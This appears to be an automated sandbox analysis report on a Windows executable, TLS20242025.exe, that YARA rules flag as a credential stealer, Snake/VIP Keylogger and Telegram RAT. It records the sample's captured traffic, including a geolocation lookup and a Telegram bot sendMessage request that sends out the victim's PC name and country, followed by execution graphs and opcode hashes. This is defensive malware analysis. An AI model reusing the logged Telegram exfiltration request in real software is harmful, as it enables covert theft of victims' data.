                                                2024-09-26 13:19:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 13:19:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.649734149.154.167.2204435576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 13:19:16 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-09-26 13:19:17 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Thu, 26 Sep 2024 13:19:16 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-09-26 13:19:17 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:09:19:03
                                                Start date:26/09/2024
                                                Path:C:\Users\user\Desktop\TLS20242025.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\TLS20242025.exe"
                                                Imagebase:0x530000
                                                File size:920'064 bytes
                                                MD5 hash:BFABEAF94D00B7C6B4AF9AA3463FF5A5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:false

                                                Target ID:2
                                                Start time:09:19:04
                                                Start date:26/09/2024
                                                Path:C:\Users\user\Desktop\TLS20242025.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\TLS20242025.exe"
                                                Imagebase:0x730000
                                                File size:920'064 bytes
                                                MD5 hash:BFABEAF94D00B7C6B4AF9AA3463FF5A5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:6.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:4
                                                  Total number of Limit Nodes:1
                                                  execution_graph 12381 275e398 12382 275e3e0 GetModuleHandleW 12381->12382 12383 275e3da 12381->12383 12384 275e40d 12382->12384 12383->12382

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 275e398-275e3d8 1 275e3e0-275e40b GetModuleHandleW 0->1 2 275e3da-275e3dd 0->2 3 275e414-275e428 1->3 4 275e40d-275e413 1->4 2->1 4->3
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0275E3FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4585036024.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2750000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f5bc78d7a517a2f7eebf8f06c0d88cf0ec9f4b8bfaae0447fd8dfc2487c3adaf
                                                  • Instruction ID: a5bb425f9a6e6d555d1d254c59f1abc3d1a51364ce4adba5eae483f8bdb25178
                                                  • Opcode Fuzzy Hash: f5bc78d7a517a2f7eebf8f06c0d88cf0ec9f4b8bfaae0447fd8dfc2487c3adaf
                                                  • Instruction Fuzzy Hash: 7E1113B5C003498FDB10CF9AC444BDEFBF4AF88324F10846AD829A7200D3B9A545CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 885 26ad01c-26ad02e 886 26ad0bd-26ad0c4 885->886 887 26ad034 885->887 888 26ad036-26ad042 886->888 887->888 889 26ad048-26ad06a 888->889 890 26ad0c9-26ad0ce 888->890 892 26ad06c-26ad086 889->892 893 26ad0d3-26ad0e8 889->893 890->889 896 26ad08e-26ad09d 892->896 897 26ad09f-26ad0a7 893->897 896->897 898 26ad0f5 896->898 899 26ad0ea-26ad0f3 897->899 900 26ad0a9-26ad0ba 897->900 899->900
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00d77397d4e856ee05216000ca7a7b7d96ffb5d55a6e787cd8ab172360c7d013
                                                  • Instruction ID: 2638ff3bafcdec4e578f42cef9746d4543a3fea2c49a6c81c13c0e8c9db93d7c
                                                  • Opcode Fuzzy Hash: 00d77397d4e856ee05216000ca7a7b7d96ffb5d55a6e787cd8ab172360c7d013
                                                  • Instruction Fuzzy Hash: A5212275604280EFDB18DF24D9D0B26BBA1FB88314F20C56DD90A4B792C77AD847CE61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 902 26ad2bc-26ad2ce 903 26ad2d4 902->903 904 26ad355-26ad35c 902->904 905 26ad2d6-26ad2e2 903->905 904->905 906 26ad361-26ad366 905->906 907 26ad2e4-26ad306 905->907 906->907 909 26ad36b-26ad380 907->909 910 26ad308-26ad31d 907->910 914 26ad337-26ad33f 909->914 913 26ad325-26ad335 910->913 913->914 915 26ad38d 913->915 916 26ad382-26ad38b 914->916 917 26ad341-26ad352 914->917 916->917
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a3635b06ac05e5d9e98146aa246cb163c71b8e76ad463406db1032837265b0a
                                                  • Instruction ID: afa8ca8c2ae1be7f28d51c2ef6a6931dd0784bfc49efb90d79455dacac8ddca5
                                                  • Opcode Fuzzy Hash: 6a3635b06ac05e5d9e98146aa246cb163c71b8e76ad463406db1032837265b0a
                                                  • Instruction Fuzzy Hash: 082135B6504244EFDB04DF14D9D0B2ABBA5FB85324F24C56DD9494BB42C37AD806CEA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 837a54d8fb7d6d571b1263bd8d84363e6814db372231b4f7a42b0a9ac926a6dc
                                                  • Instruction ID: 5ed9651c4b94488029e8d1b349782992185a6925153a74ea6190f0a0bcf88153
                                                  • Opcode Fuzzy Hash: 837a54d8fb7d6d571b1263bd8d84363e6814db372231b4f7a42b0a9ac926a6dc
                                                  • Instruction Fuzzy Hash: 3E2150755083C49FCB02CF14D994B15BF71EB46214F28C5DAD8498F6A7C33AD856CB62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                  • Instruction ID: 58490a7d08dc010e1d4a4f45cfa458319ca2cae425aebd023cb359222a47cd3d
                                                  • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                  • Instruction Fuzzy Hash: 9311B276504684CFCB11CF10D5D4B1AFB61FB85324F24C6A9D8494BB56C33AD806CF91

                                                  Execution Graph

                                                  Execution Coverage:18.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:65.8%
                                                  Total number of Nodes:38
                                                  Total number of Limit Nodes:5
                                                  execution_graph 20024 105e018 20025 105e024 20024->20025 20035 67d295f 20025->20035 20041 67d2968 20025->20041 20026 105e0c3 20046 67de24b 20026->20046 20050 67de258 20026->20050 20027 105e0ed 20054 67dfc5f 20027->20054 20058 67dfc68 20027->20058 20028 105e61f 20036 67d2928 20035->20036 20037 67d2962 20035->20037 20038 67d2a56 20037->20038 20062 67d992c 20037->20062 20066 67d9548 20037->20066 20038->20026 20042 67d298a 20041->20042 20043 67d2a56 20042->20043 20044 67d992c LdrInitializeThunk 20042->20044 20045 67d9548 LdrInitializeThunk 20042->20045 20043->20026 20044->20043 20045->20043 20047 67de250 20046->20047 20048 67d9548 LdrInitializeThunk 20047->20048 20049 67de344 20047->20049 20048->20049 20049->20027 20051 67de27a 20050->20051 20052 67d9548 LdrInitializeThunk 20051->20052 20053 67de344 20051->20053 20052->20053 20053->20027 20055 67dfc68 20054->20055 20056 67d9548 LdrInitializeThunk 20055->20056 20057 67dfd3a 20055->20057 20056->20057 20057->20028 20059 67dfc8a 20058->20059 20060 67d9548 LdrInitializeThunk 20059->20060 20061 67dfd3a 20059->20061 20060->20061 20061->20028 20065 67d97e3 20062->20065 20063 67d9a69 LdrInitializeThunk 20064 67d9a81 20063->20064 20064->20038 20065->20063 20069 67d9579 20066->20069 20067 67d96d9 20067->20038 20068 67d9a69 LdrInitializeThunk 20068->20067 20069->20067 20069->20068
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: N
                                                  • API String ID: 0-1130791706
                                                  • Opcode ID: 4f072e66490420be21f972305d4b08b9f71c86e35500978e02b18ff33b5e6f9c
                                                  • Instruction ID: 84b0f0951e3adbbbd9f27e2f861f788c3bf388a6c6bffd831d3e3bf75b755510
                                                  • Opcode Fuzzy Hash: 4f072e66490420be21f972305d4b08b9f71c86e35500978e02b18ff33b5e6f9c
                                                  • Instruction Fuzzy Hash: 5B73E331C1075A8EDB11EF68C844AADF7B1FF99300F55D69AE44867221EB70AAC5CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K
                                                  • API String ID: 0-856455061
                                                  • Opcode ID: b60c090a24e3e93ecb89e8c3762f9d61721c9992c77ec4bf693e05681e9bf9ac
                                                  • Instruction ID: bbfb6c6f13e59462b7e863346047c8497d27e5fedb290e1d62dbcd27f9c90a08
                                                  • Opcode Fuzzy Hash: b60c090a24e3e93ecb89e8c3762f9d61721c9992c77ec4bf693e05681e9bf9ac
                                                  • Instruction Fuzzy Hash: 4C33F370C147198EDB51EFA8C884AADF7B1FF99300F11D69AD44867225EB70AAC5CF81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 985 67d9548-67d9577 986 67d957e-67d9614 985->986 987 67d9579 985->987 989 67d96b3-67d96b9 986->989 987->986 990 67d96bf-67d96d7 989->990 991 67d9619-67d962c 989->991 992 67d96d9-67d96e6 990->992 993 67d96eb-67d96fe 990->993 994 67d962e 991->994 995 67d9633-67d9684 991->995 996 67d9a81-67d9b7e 992->996 997 67d9705-67d9721 993->997 998 67d9700 993->998 994->995 1011 67d9697-67d96a9 995->1011 1012 67d9686-67d9694 995->1012 1003 67d9b86-67d9b90 996->1003 1004 67d9b80-67d9b85 996->1004 1000 67d9728-67d974c 997->1000 1001 67d9723 997->1001 998->997 1007 67d974e 1000->1007 1008 67d9753-67d9785 1000->1008 1001->1000 1004->1003 1007->1008 1017 67d978c-67d97ce 1008->1017 1018 67d9787 1008->1018 1014 67d96ab 1011->1014 1015 67d96b0 1011->1015 1012->990 1014->1015 1015->989 1020 67d97d5-67d97de 1017->1020 1021 67d97d0 1017->1021 1018->1017 1022 67d9a06-67d9a0c 1020->1022 1021->1020 1023 67d97e3-67d9808 1022->1023 1024 67d9a12-67d9a25 1022->1024 1025 67d980f-67d9846 1023->1025 1026 67d980a 1023->1026 1027 67d9a2c-67d9a47 1024->1027 1028 67d9a27 1024->1028 1036 67d984d-67d987f 1025->1036 1037 67d9848 1025->1037 1026->1025 1029 67d9a4e-67d9a62 1027->1029 1030 67d9a49 1027->1030 1028->1027 1034 67d9a69-67d9a7f LdrInitializeThunk 1029->1034 1035 67d9a64 1029->1035 1030->1029 1034->996 1035->1034 1039 67d9881-67d98a6 1036->1039 1040 67d98e3-67d98f6 1036->1040 1037->1036 1043 67d98ad-67d98db 1039->1043 1044 67d98a8 1039->1044 1041 67d98fd-67d9922 1040->1041 1042 67d98f8 1040->1042 1047 67d9924-67d9925 1041->1047 1048 67d9931-67d9969 1041->1048 1042->1041 1043->1040 1044->1043 1047->1024 1049 67d996b 1048->1049 1050 67d9970-67d99d1 call 67d9328 1048->1050 1049->1050 1056 67d99d8-67d99fc 1050->1056 1057 67d99d3 1050->1057 1060 67d99fe 1056->1060 1061 67d9a03 1056->1061 1057->1056 1060->1061 1061->1022
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70898bb4d335299400934fc0af0bb925d019f683ac0658e008d29dd7a3f08195
                                                  • Instruction ID: 11628de9ba18119f11d382d8e99dd069b6b24105ab45d91945d2d997b455f14a
                                                  • Opcode Fuzzy Hash: 70898bb4d335299400934fc0af0bb925d019f683ac0658e008d29dd7a3f08195
                                                  • Instruction Fuzzy Hash: 1AF10574E00218CFDB54DFA9C884B9DFBB2BF88304F1486A9D948AB355DB719986CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1195 67d1e70-67d1e72 1196 67d1e7a 1195->1196 1197 67d1e74-67d1e79 1195->1197 1198 67d1e7c-67d1e81 1196->1198 1199 67d1e82-67d1ea1 1196->1199 1197->1196 1198->1199 1200 67d1ea8-67d1fd0 1199->1200 1201 67d1ea3 1199->1201 1205 67d1fdb-67d2010 1200->1205 1201->1200 1206 67d2018-67d202b 1205->1206 1207 67d2012-67d2013 1205->1207 1208 67d20ea-67d2103 1206->1208 1209 67d2547-67d254e 1207->1209 1210 67d2109-67d2113 1208->1210 1211 67d2030-67d203c 1208->1211 1214 67d250f-67d2546 1210->1214 1215 67d2119-67d21d8 1210->1215 1212 67d203e 1211->1212 1213 67d2043-67d2087 1211->1213 1212->1213 1219 67d2089-67d2093 1213->1219 1220 67d20b1-67d20bc 1213->1220 1214->1209 1234 67d21da-67d21e6 1215->1234 1235 67d21e7 1215->1235 1223 67d209a-67d20b0 1219->1223 1224 67d2095 1219->1224 1221 67d20be-67d20d2 1220->1221 1222 67d20d4-67d20e0 1220->1222 1221->1210 1226 67d20e7 1222->1226 1227 67d20e2 1222->1227 1223->1220 1224->1223 1226->1208 1227->1226 1234->1235 1235->1214
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  • Opcode ID: 47fe97ad29dd0fe06ab8371c14721846453eed52d350567854af223c9f70ee83
                                                  • Instruction ID: a5c2c7e0acee7aef114f00ee096b80029c767502c87862270324799be4355afb
                                                  • Opcode Fuzzy Hash: 47fe97ad29dd0fe06ab8371c14721846453eed52d350567854af223c9f70ee83
                                                  • Instruction Fuzzy Hash: 73519A71E016588BEB58CF6BC94479AFAF3AFC9204F14C1E9C40CA6254EB740A868F50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43f830f7a919d65b00d70453ed4946875bbaee8b3d69f5d4e298c5c0557edaff
                                                  • Instruction ID: deeaad6aa1d1f578a4f6997f0c071b13226ae94e12ebed5272591428a1fad23a
                                                  • Opcode Fuzzy Hash: 43f830f7a919d65b00d70453ed4946875bbaee8b3d69f5d4e298c5c0557edaff
                                                  • Instruction Fuzzy Hash: E6826F34B00209DFCB55CFA8C584AAFBBF2FF88310F158699E9559B266D730E981CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1495 67d0b30-67d0b50 1496 67d0b57-67d0bd9 1495->1496 1497 67d0b52 1495->1497 1499 67d0c3e-67d0c54 1496->1499 1497->1496 1500 67d0bdb-67d0be4 1499->1500 1501 67d0c56-67d0ca0 1499->1501 1502 67d0beb-67d0c34 1500->1502 1503 67d0be6 1500->1503 1510 67d0d0b-67d0d0c 1501->1510 1511 67d0ca2-67d0ce3 1501->1511 1508 67d0c3b 1502->1508 1509 67d0c36 1502->1509 1503->1502 1508->1499 1509->1508 1512 67d0d0d-67d0d3e 1510->1512 1516 67d0d05-67d0d06 1511->1516 1517 67d0ce5-67d0d03 1511->1517 1518 67d0d45-67d0dac 1512->1518 1519 67d0d07-67d0d09 1516->1519 1517->1519 1524 67d16fe-67d1733 1518->1524 1525 67d0db2-67d0dd3 1518->1525 1519->1512 1528 67d16db-67d16f7 1525->1528 1529 67d16fd 1528->1529 1530 67d0dd8-67d0de1 1528->1530 1529->1524 1531 67d0de8-67d0e4e 1530->1531 1532 67d0de3 1530->1532 1536 67d0e55-67d0edf 1531->1536 1537 67d0e50 1531->1537 1532->1531 1543 67d0ef1-67d0ef8 1536->1543 1544 67d0ee1-67d0ee8 1536->1544 1537->1536 1545 67d0eff-67d0f0c 1543->1545 1546 67d0efa 1543->1546 1547 67d0eef 1544->1547 1548 67d0eea 1544->1548 1549 67d0f0e 1545->1549 1550 67d0f13-67d0f1a 1545->1550 1546->1545 1547->1545 1548->1547 1549->1550 1551 67d0f1c 1550->1551 1552 67d0f21-67d0f78 1550->1552 1551->1552 1555 67d0f7f-67d0f96 1552->1555 1556 67d0f7a 1552->1556 1557 67d0f98-67d0f9f 1555->1557 1558 67d0fa1-67d0fa9 1555->1558 1556->1555 1559 67d0faa-67d0fb4 1557->1559 1558->1559 1560 67d0fbb-67d0fc4 1559->1560 1561 67d0fb6 1559->1561 1562 67d16ab-67d16b1 1560->1562 1561->1560 1563 67d0fc9-67d0fd5 1562->1563 1564 67d16b7-67d16d1 1562->1564 1565 67d0fdc-67d0fe1 1563->1565 1566 67d0fd7 1563->1566 1570 67d16d8 1564->1570 1571 67d16d3 1564->1571 1568 67d1024-67d1026 1565->1568 1569 67d0fe3-67d0fef 1565->1569 1566->1565 1572 67d102c-67d1040 1568->1572 1573 67d0ff6-67d0ffb 1569->1573 1574 67d0ff1 1569->1574 1570->1528 1571->1570 1576 67d1689-67d1696 1572->1576 1577 67d1046-67d105b 1572->1577 1573->1568 1575 67d0ffd-67d100a 1573->1575 1574->1573 1578 67d100c 1575->1578 1579 67d1011-67d1022 1575->1579 1582 67d1697-67d16a1 1576->1582 1580 67d105d 1577->1580 1581 67d1062-67d10e8 1577->1581 1578->1579 1579->1572 1580->1581 1589 67d10ea-67d1110 1581->1589 1590 67d1112 1581->1590 1583 67d16a8 1582->1583 1584 67d16a3 1582->1584 1583->1562 1584->1583 1591 67d111c-67d113c 1589->1591 1590->1591 1593 67d12bb-67d12c0 1591->1593 1594 67d1142-67d114c 1591->1594 1597 67d1324-67d1326 1593->1597 1598 67d12c2-67d12e2 1593->1598 1595 67d114e 1594->1595 1596 67d1153-67d117c 1594->1596 1595->1596 1600 67d117e-67d1188 1596->1600 1601 67d1196-67d1198 1596->1601 1599 67d132c-67d134c 1597->1599 1611 67d130c 1598->1611 1612 67d12e4-67d130a 1598->1612 1603 67d1683-67d1684 1599->1603 1604 67d1352-67d135c 1599->1604 1606 67d118f-67d1195 1600->1606 1607 67d118a 1600->1607 1602 67d1237-67d1246 1601->1602 1613 67d124d-67d1252 1602->1613 1614 67d1248 1602->1614 1610 67d1685-67d1687 1603->1610 1608 67d135e 1604->1608 1609 67d1363-67d138c 1604->1609 1606->1601 1607->1606 1608->1609 1618 67d138e-67d1398 1609->1618 1619 67d13a6-67d13b4 1609->1619 1610->1582 1615 67d1316-67d1322 1611->1615 1612->1615 1616 67d127c-67d127e 1613->1616 1617 67d1254-67d1264 1613->1617 1614->1613 1615->1599 1622 67d1284-67d1298 1616->1622 1620 67d126b-67d127a 1617->1620 1621 67d1266 1617->1621 1623 67d139f-67d13a5 1618->1623 1624 67d139a 1618->1624 1625 67d1453-67d1462 1619->1625 1620->1622 1621->1620 1627 67d119d-67d11b8 1622->1627 1628 67d129e-67d12b6 1622->1628 1623->1619 1624->1623 1629 67d1469-67d146e 1625->1629 1630 67d1464 1625->1630 1631 67d11bf-67d1229 1627->1631 1632 67d11ba 1627->1632 1628->1610 1633 67d1498-67d149a 1629->1633 1634 67d1470-67d1480 1629->1634 1630->1629 1651 67d122b 1631->1651 1652 67d1230-67d1236 1631->1652 1632->1631 1635 67d14a0-67d14b4 1633->1635 1636 67d1487-67d1496 1634->1636 1637 67d1482 1634->1637 1638 67d13b9-67d13d4 1635->1638 1639 67d14ba-67d1523 1635->1639 1636->1635 1637->1636 1641 67d13db-67d1445 1638->1641 1642 67d13d6 1638->1642 1649 67d152c-67d167f 1639->1649 1650 67d1525-67d1527 1639->1650 1656 67d144c-67d1452 1641->1656 1657 67d1447 1641->1657 1642->1641 1653 67d1680-67d1681 1649->1653 1650->1653 1651->1652 1652->1602 1653->1564 1656->1625 1657->1656
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc9265282c5aaf43ae0fa69c58f5ca77fc0cdd7575f5d18e7493c91424c5b86a
                                                  • Instruction ID: 5a597e1518bb41282fac9159084742a32e4d210f71a5d1fac63d4c72417f3ca1
                                                  • Opcode Fuzzy Hash: bc9265282c5aaf43ae0fa69c58f5ca77fc0cdd7575f5d18e7493c91424c5b86a
                                                  • Instruction Fuzzy Hash: C672ED74E01269CFDBA4DF69C984BEDBBB2BB49300F5495E9D408A7255EB309E81CF40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8e4e663da216f8227505e9064b4b59c0dbdc6fd3c9d3931ac8a13b6b6b2ba39
                                                  • Instruction ID: 48b021e52e610eb4c29127d1537b0aa48468eca8878d93c8d9902b4c6b5ab319
                                                  • Opcode Fuzzy Hash: a8e4e663da216f8227505e9064b4b59c0dbdc6fd3c9d3931ac8a13b6b6b2ba39
                                                  • Instruction Fuzzy Hash: 3112BE70A002198FDB58DFA9C854BAEBBF6FF88300F508569E9459B395DF319D81CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3175 1056fc8-1056ffe 3303 1057000 call 10569a0 3175->3303 3304 1057000 call 1057118 3175->3304 3305 1057000 call 1056fc8 3175->3305 3176 1057006-105700c 3177 105705c-1057060 3176->3177 3178 105700e-1057012 3176->3178 3181 1057077-105708b 3177->3181 3182 1057062-1057071 3177->3182 3179 1057014-1057019 3178->3179 3180 1057021-1057028 3178->3180 3179->3180 3184 10570fe-105713b 3180->3184 3185 105702e-1057035 3180->3185 3183 1057093-105709a 3181->3183 3306 105708d call 1059dd0 3181->3306 3307 105708d call 105a088 3181->3307 3308 105708d call 105a0e8 3181->3308 3186 1057073-1057075 3182->3186 3187 105709d-10570a7 3182->3187 3196 1057146-1057166 3184->3196 3197 105713d-1057143 3184->3197 3185->3177 3190 1057037-105703b 3185->3190 3186->3183 3188 10570b1-10570b5 3187->3188 3189 10570a9-10570af 3187->3189 3192 10570bd-10570f7 3188->3192 3193 10570b7 3188->3193 3189->3192 3194 105703d-1057042 3190->3194 3195 105704a-1057051 3190->3195 3192->3184 3193->3192 3194->3195 3195->3184 3198 1057057-105705a 3195->3198 3204 105716d-1057174 3196->3204 3205 1057168 3196->3205 3197->3196 3198->3183 3207 1057176-1057181 3204->3207 3206 10574fc-1057505 3205->3206 3208 1057187-105719a 3207->3208 3209 105750d-1057521 3207->3209 3214 10571b0-10571cb 3208->3214 